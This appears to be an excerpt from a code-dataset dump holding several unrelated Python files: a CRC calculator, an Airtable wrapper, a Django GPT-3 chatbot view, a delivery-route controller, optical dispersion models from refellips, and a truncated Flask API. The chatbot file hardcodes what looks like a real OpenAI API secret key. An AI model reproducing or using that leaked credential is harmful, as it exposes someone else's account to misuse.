seq_probs_masked = seq_probs[..., 1] * masks\r\n plt.figure(figsize=(20, 1))\r\n plt.imshow(seq_probs_masked[:, :max_len], cmap='binary')\r\n return err_char_lst\r\n ","repo_name":"holajoa/chinese-grammar-error-detection","sub_path":"pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":13388,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"53948579556","text":"import os\nimport sys\n\n# macro\nCRC_LEN = 7\nCRC_INIT = int(\"0x00\", 16)\nCRC_POLY = int(\"0x89\", 16)\n\n# file\nif len(sys.argv) != 2:\n print(\"Error: argument 'only one file name' not meet!\")\n exit(0)\nwith open(sys.argv[1]) as f:\n # label\n print(\"File: %s, open success!\" % sys.argv[1])\n # get bit num\n bit_num = f.readline()\n bit_num = bit_num.strip()\n bit_num = int(bit_num)\n # get byte num\n if (bit_num & 7) == 0:\n byte_num = int(bit_num/8) + 0\n else:\n byte_num = int(bit_num/8) + 1\n print(\"bit_num: %d, byte_num: %d\" % (bit_num, byte_num))\n # read byte\n dat = []\n for i in range(byte_num):\n line = int(f.readline().strip(), 16)\n dat.append(line)\n# dat\nprint(dat)\n# crc\ncrc = CRC_INIT\nfor i in range(bit_num):\n # get idx\n bit_idx = 7 - i%8 # msb first\n byte_idx = int(i/8)\n # din\n din = (dat[byte_idx] >> bit_idx) & 1\n # crc\n crc = (crc << 1) + din;\n msb = (crc >> CRC_LEN) & 1\n if msb == 1:\n crc = crc ^ CRC_POLY\n# padding\nfor i in range(CRC_LEN):\n din = 0\n crc = (crc << 1) + din\n msb = (crc >> CRC_LEN) & 1\n if msb == 1:\n crc = crc ^ CRC_POLY\nprint(\"crc: \", hex(crc))\n\n\n\n\n\n","repo_name":"zwm/crc","sub_path":"crc.py","file_name":"crc.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"23573010789","text":"from airtable import Airtable\nfrom datetime import datetime, timedelta, timezone\nimport json\nfrom pathlib import Path\nimport os\n\nAIRTABLE_API_KEY = os.environ['AIRTABLE_API_KEY']\nAIRTABLE_M4C_BASE_KEY = os.environ['AIRTABLE_M4C_BASE_KEY']\n\nwith open(Path(__file__).parent / 'applahkO2yeDOzBFB.json') as f:\n base_schema = json.load(f)\n\nnon_writable_column_types = ['formula', 'lookup', 'multipleAttachment']\n \ndef parse_airtable_timestamp(date_str):\n do = datetime.strptime(date_str, '%Y-%m-%dT%H:%M:%S.000Z')\n return do.replace(tzinfo=timezone.utc)\n\n\ntables = [\n ('tbl88dJxsFd7fcTH2', 'Maker Production'),\n ('tblBGSTm13uFTcw5S', 'Users'),\n ('tblV01D6PysZMnjdn', 'Maker Information'),\n ('tblyRQF7ekQsGQauh', 'Key Locations'), \n]\n\nid2name = { id: name for id, name in tables } \nname2id = { name: id for id, name in tables }\n\n\nclass MyAirtable(Airtable):\n \n def __init__(self, base_key, table_id, api_key):\n Airtable.__init__(self, base_key, table_id, api_key)\n self.schema = base_schema[table_id]\n \n @property\n def columns(self):\n columns_array = self.schema['columns']\n columns_dict = { col['name']: col for col in columns_array }\n return columns_dict\n\n @property\n def writable_columns(self):\n return {k: v for k, v in self.columns.items() if v['type'] not in non_writable_column_types}\n \n def get_writables(self, record_id):\n record = self.get(record_id)\n fields = record['fields']\n cols = self.writable_columns\n # cols_dict = { col['name']: col for col in cols }\n writable_fields = { k : v for k, v in fields.items() if k in cols}\n record['fields'] = writable_fields\n return record\n\n def update_writables(self, record_id, fields, typecast=False): \n \"\"\"\n \n automatically skip those fields that can not be updated (e.g., formula, lookup)\n \n \"\"\"\n \n cols = self.writable_columns\n cols_dict = { col['name']: col for col in cols }\n writable_fields = { k : v for k, v in fields.items() if k in cols_dict}\n \n Airtable.update(self, record_id, writable_fields, typecast)\n \n def get_modified_since(self, datetime_since):\n \n modified_records = []\n\n def convert_last_modified_time(record):\n last_modified_time = record['fields']['Last modified time']\n datetime_last_modified = parse_airtable_timestamp(last_modified_time)\n record['fields']['Last modified time'] = datetime_last_modified\n\n def is_modified_since_last_sync(record):\n last_modified_time = record['fields']['Last modified time']\n # datetime_last_modified = parse_airtable_timestamp(last_modified_time)\n if datetime_since:\n return last_modified_time > datetime_since \n else:\n return True\n\n for page in self.get_iter(page_size = 20, sort = [('Last modified time', 'desc')]):\n for record in page:\n convert_last_modified_time(record)\n if not is_modified_since_last_sync(record):\n return modified_records\n\n modified_records.append(record)\n\n return modified_records \n \n def rename_readonly_fields(self, record):\n \n columns_dict = { col['name']: col for col in self.columns }\n\n new_record = {\n 'id': record['id'],\n 'fields': {}\n }\n for k, v in record['fields'].items():\n if columns_dict.get(k) and columns_dict[k]['type'] in non_writable_column_types:\n k1 = '$' + k\n else:\n k1 = k\n new_record['fields'][k1] = v\n return new_record\n\nclass M4CBase:\n\n def __init__(self):\n \n self.maker_information = MyAirtable(AIRTABLE_M4C_BASE_KEY, 'tblV01D6PysZMnjdn', api_key=AIRTABLE_API_KEY)\n self.users = MyAirtable(AIRTABLE_M4C_BASE_KEY, 'tblBGSTm13uFTcw5S', api_key=AIRTABLE_API_KEY)\n self.maker_production = MyAirtable(AIRTABLE_M4C_BASE_KEY, 'tbl88dJxsFd7fcTH2', api_key=AIRTABLE_API_KEY)\n self.maker_supply_requests = MyAirtable(AIRTABLE_M4C_BASE_KEY, 'tblAS9hFkRwkwwHqj', api_key=AIRTABLE_API_KEY)\n self.shipping = MyAirtable(AIRTABLE_M4C_BASE_KEY, 'tblCnJGc2lRohQSMi', api_key=AIRTABLE_API_KEY)\n self.equipment_requests = MyAirtable(AIRTABLE_M4C_BASE_KEY, 'tbl6yaV3QsOjAnoIq', api_key=AIRTABLE_API_KEY)\n self.key_locations = MyAirtable(AIRTABLE_M4C_BASE_KEY, 'tblyRQF7ekQsGQauh', api_key=AIRTABLE_API_KEY)\n self.messages = MyAirtable(AIRTABLE_M4C_BASE_KEY, 'tblxeZ6CrHQgTwRbC', api_key=AIRTABLE_API_KEY)\n self.regions = MyAirtable(AIRTABLE_M4C_BASE_KEY, 'tbl6Q1WRJVatjOJsc', api_key=AIRTABLE_API_KEY)\n \n @property\n def tables(self):\n return {\n 'Users': self.users, \n 'Maker Information': self.maker_information,\n 'Maker Production': self.maker_production,\n 'Maker Supply Requests': self.maker_supply_requests,\n 'Equipment Requests':self.equipment_requests,\n 'Shipping': self.shipping,\n 'Key Locations': self.key_locations,\n 'Messages': self.messages\n } \n","repo_name":"make4covid/services","sub_path":"m4c/base/m4c_base.py","file_name":"m4c_base.py","file_ext":"py","file_size_in_byte":5297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70070607690","text":"import openai\nfrom django.shortcuts import render\nfrom .models import ChatbotMessage\nopenai.api_key = \"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\" #GPT-3 API key\n\n\ndef chatbot_view(request):\n if request.method == 'POST':\n user_input = request.POST['user_input']\n # Generate chatbot response using GPT-3\n response = generate_response(user_input)\n # Save the user input and chatbot response to the database\n chatbot_message = ChatbotMessage(user_input=user_input, chatbot_response=response)\n chatbot_message.save()\n else:\n response = \"\"\n # Get the last 10 chatbot messages from the database\n chatbot_messages = ChatbotMessage.objects.order_by('-timestamp')[:10]\n context = {'response': response, 'chatbot_messages': chatbot_messages}\n return render(request, 'chatbot/chatbot.html', context)\n\n\ndef generate_response(user_input):\n prompt = f\"User: {user_input}\\nChatbot:\"\n response = openai.Completion.create(\n engine=\"text-davinci-003\",\n prompt=prompt,\n temperature=0.5,\n max_tokens=1024,\n top_p=1,\n frequency_penalty=0,\n presence_penalty=0,\n stop=[\"User:\"]\n )\n return response.choices[0].text.strip()\n\n\n# Define function to generate chatbot response\n# def generate_response(user_input, chat_history=None):\n# prompt = f\"You:{user_input}\\nDoctorAI:\"\n#\n# if chat_history:\n# prompt = f\"{chat_history}\\n{prompt}\"\n#\n# response = openai.Completion.create(\n# engine=\"davinci\",\n# prompt=prompt,\n# temperature=0.5,\n# max_tokens=1024,\n# top_p=1,\n# frequency_penalty=0,\n# presence_penalty=0,\n# stop=[\"User:\"]\n# )\n#\n# chat_history = f\"{prompt}{response.choices[0].text.strip()}\"\n#\n# return response.choices[0].text.strip(), chat_history","repo_name":"libomun/hs","sub_path":"apps/chat/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37946135494","text":"# Jeremy Greenwood ----- ID#: 000917613\n# Mentor: Rebekah McBride\n# WGU C950 - Data Structures and Algorithms II\n# Performance Assessment: NHP1\n\nfrom datetime import timedelta\nfrom package import Status\n\n\nclass DeliveryController:\n # O(1)\n def __init__(self, route, table):\n \"\"\" Create Delivery Route Manager.\n\n :param route: Route\n :param table: HashTable \"\"\"\n self._route = route\n self._current_edge = self._route.order[0]\n self.event_time = self._route.get_start_time()\n self.total_mileage = 0\n self._table = table\n\n # O(n)^2\n def start_route(self):\n \"\"\" Initialize variables & advance next_node reference to Destination(). \"\"\"\n # set all packages in truck as OUT_FOR_DELIVERY\n for edge in self._route.order:\n node = edge.next_node\n for pkg in node.get_package_keys():\n package = self._table.search(pkg)\n package.ofd()\n # mark time for first delivery to execute\n self.event_time += timedelta(hours=float(self._current_edge.weight) / self._route.rate_of_travel)\n\n # O(n)\n def make_delivery(self, current_time):\n \"\"\" Mark packages as DELIVERED, set current_node, advance next_node.\n\n :param current_time: datetime \"\"\"\n # advance mileage to destination\n self.total_mileage += float(self._current_edge.weight)\n\n # mark packages at vertex as delivered\n for package in self._route.get_next_node().get_package_keys():\n pkg = self._table.search(package)\n pkg.deliver(self.event_time)\n\n # advance to next edge\n self._current_edge = self._route.get_next_edge()\n\n # update time of next delivery event\n self.event_time = current_time + timedelta(hours=float(self._current_edge.weight) / self._route.rate_of_travel)\n\n # if route is complete, mark finished\n if self._current_edge == self._route.order[len(self._route.order) - 1]:\n self.total_mileage += float(self._current_edge.weight)\n self._route.finish_route()\n\n # O(1)\n def alter_delivery(self, package, location, graph):\n \"\"\" Edit route.order to remove 1 vertex and add another.\n\n :param package: Package\n :param location: Vertex\n :param graph: Graph \"\"\"\n\n # remove package_key from old location\n old_location = package.address # get address\n old_location = self._route.get_vertex(old_location) # get obj reference\n old_location.del_package_key(str(package)) # alter keys\n\n\n # add package_key to new location\n package.address = location # update address\n new_location = graph.get_vertex(location) # get obj reference\n new_location.add_package_key(str(package)) # update keys\n\n if package.get_status() == Status(4):\n print('retrieve') # retrieve delivered package\n else:\n self._route.alter_course(new_location)\n","repo_name":"jgreenwd/WGU-classes","sub_path":"C950/delivery.py","file_name":"delivery.py","file_ext":"py","file_size_in_byte":3068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"34311020040","text":"import numpy as np\nimport os\nimport os.path\nimport glob\nfrom pathlib import PurePath\nimport scipy.fftpack as ft\n\n\nfrom refnx.analysis import (\n Parameters,\n possibly_create_parameter,\n sequence_to_parameters,\n)\n\nfrom .structureSE import ScattererSE, nm_eV_conversion\n\n\n# list of material dispersion curves distributed with refellips\n_pth = os.path.dirname(os.path.abspath(__file__))\n_material_files = glob.glob(os.path.join(_pth, \"materials/*.csv\"))\nmaterials = [os.path.basename(m)[:-4] for m in _material_files]\n\n\nclass RI(ScattererSE):\n \"\"\"\n Object representing a materials wavelength-dependent refractive index.\n\n An issue is that optical parameters are supplied in units of micrometers\n ('cause thats what seems to be used in refractive index repos and\n cauchy models), the wavelength of the incident radiation is supplied in\n nanometers (thats typical) and the fitting is done in angstroms. Very\n unpleasant.\n\n Parameters\n ----------\n dispersion : {str, Path, tuple, np.ndarray)\n If a string then a dispersion curve will be loaded from a file that\n the string points to. The file is assumed to be of CSV format, with the\n first column holding the wavelength (in *microns*), with the second\n column specifying the refractive index. An optional third column can be\n present that should hold the extinction coefficient.\n\n If `dispersion` has length 2 (float, float), then dispersion[0] points\n to the refractive index of the material and dispersion[1] points to the\n extinction coefficient. This refractive index is assumed to be\n wavelength independent.\n\n If `dispersion` has length 3, then dispersion[0], dispersion[1],\n dispersion[2] are assumed to hold arrays specifying the wavelength (in\n *microns*), refractive index, and extinction coefficient.\n wavelength : float\n default wavelength for calculation (nm)\n name : str, optional\n Name of material.\n\n Notes\n -----\n An RI object can be used to create a Slab\n \"\"\"\n\n def __init__(self, dispersion=None, wavelength=658, name=\"\"):\n super(RI, self).__init__(name=name, wavelength=wavelength)\n\n # _wav is only set if a wavelength dependent dispersion curve is loaded\n # assumed to be in nm\n self._wav = None\n self._RI = None\n self._EC = None\n\n if dispersion is None:\n raise RuntimeError(\"dispersion must be specified\")\n\n if dispersion is not None:\n if type(dispersion) is str or isinstance(dispersion, PurePath):\n if not len(name):\n # if there is no name get it from the path\n name = os.path.basename(dispersion).split(\".\")[0]\n\n vals = np.loadtxt(\n dispersion, skiprows=1, delimiter=\",\", encoding=\"utf8\"\n ).T\n self._wav = vals[0]\n self._RI = vals[1]\n self._EC = np.zeros_like(self._wav)\n if len(vals) == 3:\n self._EC = vals[2]\n # convert wavelength from um to nm\n self._wav = self._wav * 1000\n elif len(dispersion) == 2:\n self._RI, self._EC = dispersion\n elif len(dispersion) == 3:\n # this is if you have an (3, N) array or tuple specifying\n # wavelength, RI, extinction coef.\n # wavelength assumed to be in *nm*\n self._wav, self._RI, self._EC = dispersion\n self._wav *= 1000\n else:\n raise TypeError(\"format not recognised\")\n\n @property\n def parameters(self):\n return Parameters(name=self.name)\n\n def complex(self, wavelength):\n \"\"\"\n Calculate a complex RI\n\n Parameters\n ----------\n wavelength : float\n wavelength of light in nm\n\n Returns\n -------\n RI : complex\n refractive index and extinction coefficient\n \"\"\"\n wav = self.wavelength\n if np.any(wavelength):\n wav = wavelength\n\n if np.any(self._wav):\n # return a wavelength from a dispersion curve\n # TODO - raise a warning if the wavelength supplied is outside the\n # wavelength range covered by the data file.\n ri_real = np.interp(wav, self._wav, self._RI)\n ri_imag = np.interp(wav, self._wav, self._EC)\n return ri_real + 1j * ri_imag\n\n else:\n return self._RI + 1j * self._EC\n\n\ndef load_material(material):\n \"\"\"\n Loads a dispersion curve from a file distributed with refellips.\n\n Parameters\n ----------\n material: str\n One of the materials in ``refellips.materials``\n\n Returns\n -------\n ri: refellips.RI\n\n Notes\n -----\n To get a list of the dispersion curves distributed with refellips examine\n the entries in ``refellips.materials``.\n \"\"\"\n if material in materials:\n pth = os.path.join(_pth, \"materials\", f\"{material}.csv\")\n return RI(dispersion=pth)\n raise ValueError(f\"{material} is not in the list of dispersion curves\")\n\n\nclass Cauchy(ScattererSE):\n \"\"\"\n Cauchy model for wavelength-dependent refractive index.\n\n Optical parameters are supplied in units of micrometers\n ('cause thats what seems to be used in refractive index repos and\n cauchy models), the wavelength of the incident radiation is supplied in\n nanometers (that's typical) and the fitting is done in angstroms.\n\n The refractive index is calculated as:\n ``A + (B * 1000**2) / (wav**2) + (C * 1000**4) / (wav**4)``\n\n where the factors of 1000 convert from microns to nm.\n\n Parameters\n ----------\n A : float or parameter\n Cauchy parameter A.\n B : float or parameter\n Cauchy parameter B in um^2. Default 0.\n C : float or parameter\n Cauchy parameter C in um^4. Default 0.\n wavelength : float\n default wavelength for calculation (nm)\n name : str, optional\n Name of material.\n \"\"\"\n\n def __init__(self, A, B=0, C=0, wavelength=658, name=\"\"):\n super().__init__(name=name, wavelength=wavelength)\n self.A = possibly_create_parameter(A, name=f\"{name} - cauchy A\")\n self.B = possibly_create_parameter(B, name=f\"{name} - cauchy B\")\n self.C = possibly_create_parameter(C, name=f\"{name} - cauchy C\")\n self._parameters = Parameters(name=name)\n self._parameters.extend([self.A, self.B, self.C])\n\n @property\n def parameters(self):\n return self._parameters\n\n def complex(self, wavelength):\n \"\"\"\n Calculate a complex RI\n\n Parameters\n ----------\n wavelength : float\n wavelength of light in nm\n\n Returns\n -------\n RI : complex\n refractive index and extinction coefficient\n \"\"\"\n wav = self.wavelength\n if np.any(wavelength):\n wav = wavelength\n\n real = (\n self.A.value\n + (self.B.value * 1000**2) / (wav**2)\n + (self.C.value * 1000**4) / (wav**4)\n )\n return real + 1j * 0.0\n\n\nclass Sellmeier(ScattererSE):\n r\"\"\"\n Dispersion curves for Sellmeier oscillators.\n\n Parameters\n ----------\n Am: {float, Parameter}\n Amplitude of Sellmeier in μm.\n En: {float, Parameter}\n Center energy of oscillator in μm.\n P: {float, Parameter}\n Position of a pole in μm.\n Einf: {float, Parameter}\n Offset term\n wavelength : float\n default wavelength for calculation (nm)\n name : str, optional\n Name of material.\n\n Notes\n -----\n Calculates dispersion curves of a Sellmeier oscillator as implemented in\n CompleteEase.\n CompleteEase Manual, Chapter 9, pg 9-306, J.A. Woollam Co., 2014.\n\n .. math::\n\n n = \\sqrt{ \\varepsilon (\\infty) + \\frac{Am \\lambda^2}{\\lambda^2 - En^2} - P\\lambda^2}\n\n Examples\n --------\n >>> # Create a Sellmeier oscillator\n >>> sell = Sellmeier(2, 0.1, 0.11, Einf=1)\n >>> sell.complex(658) # calculates the refractive index at 658 nm.\n \"\"\"\n\n def __init__(self, Am, En, P, Einf=1, wavelength=658, name=\"\"):\n super().__init__(name=name, wavelength=wavelength)\n\n self.Am = possibly_create_parameter(Am, name=f\"{name} - sellmeier Am\")\n self.En = possibly_create_parameter(En, name=f\"{name} - sellmeier En\")\n self.P = possibly_create_parameter(P, name=f\"{name} - sellmeier P\")\n self.Einf = possibly_create_parameter(\n Einf, name=f\"{name} - sellmeier Einf\"\n )\n\n self._parameters = Parameters(name=name)\n self._parameters.extend([self.Am, self.En, self.P, self.Einf])\n\n @property\n def parameters(self):\n return self._parameters\n\n def complex(self, wavelength):\n \"\"\"\n Calculate a complex RI for the given Sellmeier oscillator\n\n Parameters\n ----------\n wavelength : float\n wavelength of light in nm\n\n Returns\n -------\n RI : complex\n refractive index and extinction coefficient\n \"\"\"\n wav = self.wavelength\n if np.any(wavelength):\n wav = wavelength\n\n # Convert between μm & nm (constants are typically given in μm)\n wav *= 1e-3\n\n real = np.sqrt(\n self.Einf.value\n + (self.Am.value * wav**2) / (wav**2 - self.En.value**2)\n - (self.P.value * wav**2)\n )\n return real + 1j * 0.0\n\n def epsilon(self, wavelength):\n \"\"\"\n The complex dielectric function for the oscillator\n \"\"\"\n wav = self.wavelength\n if np.any(wavelength):\n wav = wavelength\n\n # Convert between μm & nm (constants are typically given in μm)\n wav *= 1e-3\n\n real = (\n self.Einf.value\n + (self.Am.value * wav**2) / (wav**2 - self.En.value**2)\n - (self.P.value * wav**2)\n )\n\n return real + 1j * 0\n\n\nclass Lorentz(ScattererSE):\n r\"\"\"\n Dispersion curves for Lorentz oscillators.\n\n Parameters\n ----------\n Am: {float, Parameter, sequence}\n Amplitude of Lorentzian\n Br: {float, Parameter, sequence}\n Broadening of oscillator\n En: {float, Parameter, sequence}\n Centre energy of oscillator (eV)\n Einf: {float, Parameter}\n Offset term\n wavelength : float\n default wavelength for calculation (nm)\n name : str, optional\n Name of material.\n\n Notes\n -----\n Calculates dispersion curves for *k* oscillators, as implemented in WVASE.\n The model is Kramers-Kronig consistent.\n The parameters for constructing this object should have\n `len(Am) == len(Br) == len(En) == k`, or be single float/Parameter.\n\n ..math::\n\n \\tilde{\\varepsilon}(h\\nu)=\\varepsilon_{1\\infty }+\\sum_{k}\\frac{A_{k}}{E_{k}^2 - (h\\nu)^2-iB_kh\\nu}\n\n Examples\n --------\n >>> # Create a single Lorentz oscillator\n >>> Lorentz(5, 0.25, 2, Einf=1)\n >>> # Create a 2 oscillator dispersion curve\n >>> lo = Lorentz([5, 10], [0.25, 0.5], [2, 4], Einf=2)\n >>> lo.complex(658) # calculates the refractive index at 658 nm.\n \"\"\"\n\n def __init__(self, Am, Br, En, Einf=1, wavelength=658, name=\"\"):\n super().__init__(name=name, wavelength=wavelength)\n\n self._parameters = Parameters(name=name)\n self.Am = sequence_to_parameters([Am])\n self.Br = sequence_to_parameters([Br])\n self.En = sequence_to_parameters([En])\n if not (len(self.Am) == len(self.Br) == len(self.En)):\n raise ValueError(\"A, B, E all have to be the same length\")\n\n self._parameters.extend([self.Am, self.Br, self.En])\n self.Einf = possibly_create_parameter(Einf)\n self._parameters.append(self.Einf)\n\n @property\n def parameters(self):\n return self._parameters\n\n def epsilon(self, energy):\n \"\"\"\n The complex dielectric function for the oscillator\n \"\"\"\n A = np.array(self.Am)[:, None]\n B = np.array(self.Br)[:, None]\n E = np.array(self.En)[:, None]\n _e = np.asfarray(energy)\n v = A / (E**2 - _e**2 - 1j * B * _e)\n r = np.atleast_1d(np.sum(v, axis=0) + self.Einf.value)\n\n if np.isscalar(energy) and len(r) == 1:\n return r[0]\n\n return r\n\n\nclass Gauss(ScattererSE):\n \"\"\"\n Dispersion curves for Gaussian oscillators.\n\n Parameters\n ----------\n Am: {float, Parameter, sequence}\n Amplitude of Gaussian\n Br: {float, Parameter, sequence}\n Broadening of oscillator\n En: {float, Parameter, sequence}\n Centre energy of oscillator (eV)\n Einf: {float, Parameter}\n Offset term\n wavelength : float\n default wavelength for calculation (nm)\n name : str, optional\n Name of material.\n\n Notes\n -----\n Calculates dispersion curves for *k* Gaussian oscillators.\n The model is Kramers-Kronig consistent.\n The parameters for constructing this object should have\n `len(Am) == len(Br) == len(En) == k`, or be single float/Parameter.\n \"\"\"\n\n def __init__(self, Am, Br, En, Einf=1, wavelength=658, name=\"\"):\n super().__init__(name=name, wavelength=wavelength)\n\n self._parameters = Parameters(name=name)\n self.Am = sequence_to_parameters([Am])\n self.Br = sequence_to_parameters([Br])\n self.En = sequence_to_parameters([En])\n if not (len(self.Am) == len(self.Br) == len(self.En)):\n raise ValueError(\"A, B, E all have to be the same length\")\n\n self.Einf = possibly_create_parameter(Einf)\n self._parameters.extend([self.Am, self.Br, self.En])\n self._parameters.append(self.Einf)\n\n @property\n def parameters(self):\n return self._parameters\n\n def epsilon(self, energy):\n \"\"\"\n The complex dielectric function for the oscillator\n \"\"\"\n A = np.array(self.Am)[:, None]\n B = np.array(self.Br)[:, None]\n E = np.array(self.En)[:, None]\n energies = np.asfarray(energy)\n\n # TODO cache if params don't change\n _e_pad = np.linspace(-20, 20, 2048)\n sigma = B / 2 / np.sqrt(np.log(2))\n e2 = A * np.exp(-(((_e_pad - E) / sigma) ** 2))\n e2 -= A * np.exp(-(((_e_pad + E) / sigma) ** 2))\n\n # e1 is Kramers-Kronig consistent via Hilbert transform\n # e1 = ft.hilbert(e2) + self.Einf.value\n e1 = np.array([ft.hilbert(_e2) for _e2 in e2])\n\n e1 = np.sum(e1, axis=0) + self.Einf.value\n e2 = np.sum(e2, axis=0)\n\n # (linearly) interpolate to find epsilon at given energy\n _e1 = np.interp(energies, _e_pad, e1)\n _e2 = np.interp(energies, _e_pad, e2)\n r = np.atleast_1d(_e1 + 1j * _e2)\n if np.isscalar(energy) and len(r) == 1:\n return r[0]\n return r\n\n\nclass TaucLorentz(ScattererSE):\n \"\"\"\n Dispersion curves for Tauc-Lorentz oscillators. The model works well for\n amorphous materials in the visible range.\n\n Parameters\n ----------\n Am: {float, Parameter, sequence}\n Amplitude of absorption. Typically in [10, 200]\n C: {float, Parameter, sequence}\n Lorentz broadening of oscillator (eV). Typically in [0, 10].\n ``C`` should be less than ``2 * En``\n En: {float, Parameter, sequence}\n Lorentz resonance energy (eV). ``En`` should be greater than ``Eg``.\n Eg: {float, Parameter}\n Common bandgap energy (eV) for all oscillators\n Einf: {float, Parameter}\n Offset term\n wavelength : float\n default wavelength for calculation (nm)\n name : str, optional\n Name of material\n\n Notes\n -----\n Calculates dispersion curves for *k* Tauc-Lorentz oscillators.\n The model is Kramers-Kronig consistent.\n The parameters for constructing this object should have\n `len(Am) == len(C) == len(En) == k`, or be single float/Parameter.\n\n Implemented using the equations from\n `Horiba technical note `_\n and also the WVASE manual and https://en.wikipedia.org/wiki/Tauc%E2%80%93Lorentz_model.\n\n The Horiba technical note gives parameters for many materials.\n\n * G.E. Jellision and F.A. Modine, Appl. Phys. Lett. 69 (3), 371-374 (1996)\n * Erratum, G.E. Jellison and F.A. Modine, Appl. Phys. Lett 69 (14), 2137 (1996)\n * H. Chen, W.Z. Shen, Eur. Phys. J. B. 43, 503-507 (2005)\n \"\"\"\n\n def __init__(self, Am, C, En, Eg, Einf=1, wavelength=658, name=\"\"):\n super().__init__(name=name, wavelength=wavelength)\n\n self._parameters = Parameters(name=name)\n self.Am = sequence_to_parameters([Am])\n self.C = sequence_to_parameters([C])\n self.En = sequence_to_parameters([En])\n if not (len(self.Am) == len(self.C) == len(self.En)):\n raise ValueError(\"A, B, E all have to be the same length\")\n\n self.Einf = possibly_create_parameter(Einf)\n self.Eg = possibly_create_parameter(Eg)\n self._parameters.extend([self.Am, self.C, self.En, self.Einf, self.Eg])\n\n @property\n def parameters(self):\n return self._parameters\n\n def epsilon(self, energy):\n \"\"\"\n The complex dielectric function for the oscillator\n \"\"\"\n A = np.array(self.Am)[:, None]\n C = np.array(self.C)[:, None]\n Ei = np.array(self.En)[:, None]\n Eg = self.Eg.value\n energies = np.asfarray(energy)\n\n a_ln = (\n (Eg**2 - Ei**2) * energies**2\n + Eg**2 * C**2\n - Ei**2 * (Ei**2 + 3 * Eg**2)\n )\n a_atan = (energies**2 - Ei**2) * (\n Ei**2 + Eg**2\n ) + Eg**2 * C**2\n alpha = np.sqrt(4 * Ei**2 - C**2)\n gamma = np.sqrt(Ei**2 - C**2 / 2)\n zeta4 = (energies**2 - gamma**2) ** 2 + 0.25 * alpha**2 * C**2\n\n e1 = (\n A\n * C\n * a_ln\n / 2\n / np.pi\n / zeta4\n / alpha\n / Ei\n * np.log(\n (Ei**2 + Eg**2 + alpha * Eg)\n / (Ei**2 + Eg**2 - alpha * Eg)\n )\n )\n e1 -= (\n A\n / np.pi\n * a_atan\n / zeta4\n / Ei\n * (\n np.pi\n - np.arctan((2 * Eg + alpha) / C)\n + np.arctan((alpha - 2 * Eg) / C)\n )\n )\n e1 += (\n 2\n * A\n * Ei\n * Eg\n * (energies**2 - gamma**2)\n / np.pi\n / zeta4\n / alpha\n * (np.pi + 2 * np.arctan(2 * (gamma**2 - Eg**2) / alpha / C))\n )\n e1 -= (\n A\n * Ei\n * C\n * (energies**2 + Eg**2)\n / np.pi\n / zeta4\n / energies\n * np.log(np.abs(energies - Eg) / (energies + Eg))\n )\n e1 += (\n 2\n * A\n * Ei\n * Eg\n * C\n / np.pi\n / zeta4\n * np.log(\n np.abs(energies - Eg)\n * (energies + Eg)\n / np.sqrt((Ei**2 - Eg**2) ** 2 + Eg**2 * C**2)\n )\n )\n e1 = np.sum(e1, axis=0) + self.Einf.value\n\n # I don't think the Hilbert Transform works all that well on this\n # dielectric function because the tail drops off v slowly.\n e2 = A * Ei * C * (energies - Eg) ** 2\n e2 /= energies * ((energies**2 - Ei**2) ** 2 + (C * energies) ** 2)\n e2 *= np.heaviside(energies - Eg, 0)\n e2 = np.sum(e2, axis=0)\n\n r = np.atleast_1d(e1 + 1j * e2)\n if np.isscalar(energy) and len(r) == 1:\n return r[0]\n return r\n","repo_name":"refnx/refellips","sub_path":"refellips/dispersion.py","file_name":"dispersion.py","file_ext":"py","file_size_in_byte":19878,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"23825827746","text":"#1. Objetivo - Criar um api que disponibiliza a consula, criação, edição e exclusão de livros.\r\n#2. URL base - localhost\r\n#3. Endpoints - \r\n #- localhost/livros (GET)\r\n #- localhost/livros (POST)\r\n #- localhost/livros/id (GET)\r\n #- Localhost/livros/id (PUT)\r\n #- localhost/livros (DELETE)\r\n#4. Quais recursos - Livros\r\n\r\nfrom flask import Flask, jsonify, request\r\n\r\napp = Flask(__name__)\r\n\r\nvendas = [\r\n\t{\r\n\t\t\"dia\":1,\r\n\t\t\"valor\": 22174.1664\r\n\t},\r\n\t{\r\n\t\t\"dia\": 2,\r\n\t\t\"valor\": 24537.6698\r\n\t},\r\n\t{\r\n\t\t\"dia\": 3,\r\n\t\t\"valor\": 26139.6134\r\n\t},\r\n\t{\r\n\t\t\"dia\": 4,\r\n\t\t\"valor\": 0.0\r\n\t},\r\n\t{\r\n\t\t\"dia\": 5,\r\n\t\t\"valor\": 0.0\r\n\t},\r\n\t{\r\n\t\t\"dia\": 6,\r\n\t\t\"valor\": 26742.6612\r\n\t},\r\n\t{\r\n\t\t\"dia\": 7,\r\n\t\t\"valor\": 0.0\r\n\t},\r\n\t{\r\n\t\t\"dia\": 8,\r\n\t\t\"valor\": 42889.2258\r\n\t},\r\n\t{\r\n\t\t\"dia\": 9,\r\n\t\t\"valor\": 46251.174\r\n\t},\r\n\t{\r\n\t\t\"dia\": 10,\r\n\t\t\"valor\": 11191.4722\r\n\t},\r\n\t{\r\n\t\t\"dia\": 11,\r\n\t\t\"valor\": 0.0\r\n\t},\r\n\t{\r\n\t\t\"dia\": 12,\r\n\t\t\"valor\": 0.0\r\n\t},\r\n\t{\r\n\t\t\"dia\": 13,\r\n\t\t\"valor\": 3847.4823\r\n\t},\r\n\t{\r\n\t\t\"dia\": 14,\r\n\t\t\"valor\": 373.7838\r\n\t},\r\n\t{\r\n\t\t\"dia\": 15,\r\n\t\t\"valor\": 2659.7563\r\n\t},\r\n\t{\r\n\t\t\"dia\": 16,\r\n\t\t\"valor\": 48924.2448\r\n\t},\r\n\t{\r\n\t\t\"dia\": 17,\r\n\t\t\"valor\": 18419.2614\r\n\t},\r\n\t{\r\n\t\t\"dia\": 18,\r\n\t\t\"valor\": 0.0\r\n\t},\r\n\t{\r\n\t\t\"dia\": 